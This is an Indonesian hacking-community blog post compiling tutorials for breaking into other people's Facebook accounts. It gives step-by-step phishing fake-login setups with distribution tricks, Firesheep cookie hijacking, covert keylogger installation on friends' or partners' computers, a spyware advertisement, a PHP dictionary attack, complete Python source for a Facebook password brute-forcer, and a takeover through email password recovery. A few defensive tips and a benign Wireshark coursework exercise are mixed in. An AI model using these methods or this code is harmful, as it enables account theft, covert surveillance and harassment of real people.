Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Berbagai Cara Hack Facebook

1 March 2011
Penulis:   · Kategori Artikel: Tutorial

BINUS HACKER Binus Hacker Is Not Criminal Banner





Berikut adalah kumpulan lengkap berbagai cara hack facebook, berbagai cara hack fb, berbagai cara hack account facebook hack facebook teman hack facebook pacar, hack facebook musuh cara hack facebook cara hack facebook orang lain cara hack facebook cara hack fb cara hack password facebook cara hack fb 2011 cara hack facebook orang. Cara hack facebook 2011 cara hack fb orang lain cara hack fb terbaru cara hack fb 2011 cara hack fb orang cara hack akun fb cara hack akun fb orang lain cara hack akun facebook terbaru cara hack akun facebook 2011 cara hack password fb cara hack account fb cara hack account facebook. Cara hack account facebook 2011 cara hack account facebook terbaru cara hack facebook teman cara hack facebook pacar cara hack fb teman cara hack fb pacar crack facebook cara crack fb. Cara menjebol fb cara menjebol akun fb cara membobol password facebook cara menjebol password facebook cara membobol facebook cara mengetahui account facebook cara mengetahui password facebook cara menghack facebook tutorial hack facebook tutorial hacking facebook. Tutorial hack fb, tutorial hacking fb tutorial hacking account fb tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook tutorial hack password facebook tutorial crack facebook.

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

PERTAMA:

Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.

KEDUA:

Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.

1. Silahkan anda daftar di http://www.united.net.kg/ atau http://www.globalweb.com.ru/hosting.php atau http://biz.ht/
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com

2. setelah anda berhasil mendaftar, masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2…

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di domain webhosting kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

preview:
http://i410.photobucket.com/albums/pp190/eta_rrrrock/kidego1.jpg

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini

http://i410.photobucket.com/albums/pp190/eta_rrrrock/32.jpg

kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . ..

KETIGA:

Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,

1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini

Password : Flow

dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.

nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.

pengertian:
– index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
– logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
– logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.

sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.

saran bagi facebook’er :

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.

Cara Hack Facebook Dengan Network Sniffing

PERTAMA:

Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.

KEDUA:

Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.

cara menggunakanya sebagai berikut:

1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik  “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.

nah gimana cara mencegah pencurian password dengan firesheep ini?

kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/

KETIGA:

Bismillah,

pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:

Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:

  1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
  2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.

Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.

Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?

langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:

  1. pertama-tama buka aplikasi wireshark :)
  2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
  3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
  4. pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
    host www.facebook.com and host alamat.ip.komputer.anda
  5. Klik start, maka proses penyadapan akan segera dimulai
  6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
  7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:

    hasil statistik sniffing paket data facebook

Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.

sekian postingan kali ini.

Cara Hack Facebook Dengan Keylogger

PERTAMA:

Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.

KEDUA:

Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?

Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.

Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha

Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.

1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .

2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …

3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho

4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!

5. Kalau proses penginstalan sudah selesai, terus ???

Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha

Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha

Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …

DOUGLAS 1.1

Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.

Nah, Selese dah !!! Mudah to ???

Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.

Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..

Selamat mencoba

KETIGA:

SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.

Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.

Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun

Cara Hack Facebook Dengan Metode Bruteforce

PERTAMA:

Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.

KEDUA:

Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com :
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory

 

Facebook HAcking

 

setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.
Bruteforce Target

 

Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.

KETIGA:

FbBruteforce

Silakan download FbBruteforce:

Berikut Codenya:


#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)

import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...

Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help

Example : %s -u brad@hackme.com -w wordlist.txt"

P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]

def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)

def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)

for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()

def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)

def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))

def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()

 

 

 

 

 

 

 

 

if __name__ == '__main__':
main()

 

Cara Hack Facebook Dengan Forgot Password Manual

Untuk mengisi kekosongan postingan dalam blog ini saya mulai dengan berbagi pengalaman kenakalan di Internet yang telah saya lakukan. Beberapa waktu sebelum dapat berhasil mencuri akun-akun FB, saya sempat kesana kemari, lari sana-sini, bolak-balik buka tutup laptop, untuk berkunjung ke “g**gle” seputar hacking akun FB dan YAH**[E-mail]. Dan beberapa saran dari blog yang ditemukan “g**gle”, bukannya malah mengerti tapi membuat saya bingung sendiri, karena hal yang mendasar untuk masuk akun FB kita harus punya E-mail, tentu kita tidak tahu karena itu bukan akun miliki sendiri. Selain itu, saya juga geram dengan sampah-sampah di blog-blog lain yang dengan enaknya menulis “bla bla bla hack fb, hack yahoo, hack bla bla bla —- semua ITU BOHONG BESAR !!!! :lol: “. Nah, apa solusi dari itu semua ?

  1. Tentukan terlebih dahulu target FB atau akun si korban. Namun apabila tidak dapat mengetahui E-mail target kita, baik secara langsung maupun dari FB jangan berharap kita bisa mencuri akun FB-nya. Beberapa setingan di FB biasanya bagi mereka yang paham pasti akan menyembunyikan keberadaan E-mail agar terhindar dari penyalahgunaan. Seperti gambar di bawah:
  2. Coba cari tahu E-mail yang digunakan. Barangkali korban yang akan dituju menggunakan E-mail selain YAH**, bersiap-siaplah untuk berpikir ulang. Karena saya kesulitan ketika menemui korban menggunakan E-mail G-m**l, keamanan atau apalah bahasa untuk keruwetan dan kerumitan pengelola layanan itu.
  3. Setelah tahu akan calon korban, baru tetapkan tujuan dan niat kita. Masuk ke YAH**, dengan akun E-mail calon korban, jika kita belum mengetahui passwordnya tentu akan ada peringatan seperti berikut:
  4. Kemudian, langsung saja kita klik “Tidak bisa mengakses account|Bantuan sign in”, akan muncul beberapa step by step. Dan muncul beberapa verifikasi, masuk kan alamat e-mail si korban yang sudah kita tentukan sebelumnya.
  5. Kurang lebih cara-cara yang akan kita tempuh seperti dibawah ini:
    Apabila masih mengalami kebingungan silahkan coba-coba terus ya,,, :-) toch ini juga kurang baik dilakukan untuk menjahili orang lain. Dari contoh di atas saya ambil contoh dengan akun E-mail saya sendiri.
    Setelah kita berhasil masuk ke akun E-mail, kita dapat melaksanakan yang biasa kita dengar istilah “Hacking FB atau semacamnya” Karena saya pribadi bingung dengan kalimat tersebut. Cara yang bagaimanapun sudah saya cari di g**gle tetap kebingungan. Mungkin dengan tulisan ini bisa membantu orang yang berminat menjadi “Hacker” tapi semua ini tidak ada gunanya sama sekali meski kita bisa berhasil mencuri akun orang lain.
    Selanjutnya, kita mulai masuk ke akun FB si target, dengan cara yang kurang lebih sama ketika kita akan mengganti password di YAH**. Bedanya saat kita masuk ke FB, kita akan di kirim kode untuk mereset password yang dikirim ke E-mail yang telah kita ambil sesuai cara di atas. :-)
    Tentu saja ini akan lebih mudah, karena kita telah mempunyai E-mail dari korban yang kita tentukan sebelumnya, metodenya seperti berikut:
  1. Pada pilihan pertama setelah kita gagal masuk dengan akun FB, akan ada pilihan seperti berikut:
    2. Kita bisa menggunakan alamat E-mail yang telah tentukan tadi, kemudian akan ada tampilan selanjutnya untuk menerima kode reset untuk di konfirmasi.
    3. Setelah menerima kode tersebut ke E-mail yang sudah kita ambil, “copy-kan” pada akun yang baru akan kita ambil alih ini.
    4. Selesai, kita bisa menggunakan akun baru yang telah kita ambil dengan mengikuti beberapa langkah petunjuk yang akan membimbing kita. Ikuti setiap instruksi selanjutnya dan kita bisa menggunakan akun baru ini. :-)
    Kesimpulan:
  1. Hal yang harus kita ketahui untuk mengambil alih akun FB orang, tentukan E-mail si target. Ini penting sekali.
  2. Saat memasuki bantuan masuk di akun YAH**, kita harus tahu: 1) E-mail target kita, 2) Mampu menjawab pertanyaan yang di ajukan. Apabila pada tahap ini belum bisa melalui semua, maka kemungkinan untuk berhasil semakin sedikit.
  3. Tahap setalah berhasil masuk ke akun E-mail tadi, kita langsung menuju akun FB untuk segera melancarkan serangan kita.
  4. Hati-hati jangan sampai ketahuan target kita bahwa sedang melakukan pencurian akun FB-nya. (Berdasarkan pengalaman, saya melakukannya ketika korban sedang online. Terpaksa harus main kebut-kebutan dech … hehehe :-) ).
  5. Setelah mampu melewati cara-cara di atas dan berhasil masuk ke akun target segera ganti login masuk FB dengan mengganti alamat E-mail atau password sesuai dengan niat kita.
  6. Saran saya, jangan pernah melakukan ini. Cukup menjadi pengalaman dari sikap ke-egoisan saya terhadap seseorang !!!
  7. Bagi calon korban-korban “Hacker” atau apalah istilah yang digunakan, berhati-hatilah terhadap data pribadi kita khususnya pada situs jejaring seperti FB atau lainnya. Tetap jaga privasi kita dari orang yang tidak kita inginkan, jangan pernah percaya dengan teman atau siapapun juga. Adakalanya kita harus berhati-hati dengan teman 1000x lebih waspada daripada musuh kita sendiri.
  8. “Hacker” dalam FB bisa jadi itu adalah teman kita sendiri atau kerabat yang telah merasa kita sakiti hatinya baik secara langsung maupun tidak sehingga  membuatnya harus mencuri akun FB kita.
  9. Terakhir ini semua pengalaman pribadi jadi jangan di praktekan ya. Terimakasih.

NB: Tutorial tambahan dari cacatan Zaiki Khiriadi http://khrzk[.]wordpress[.]com

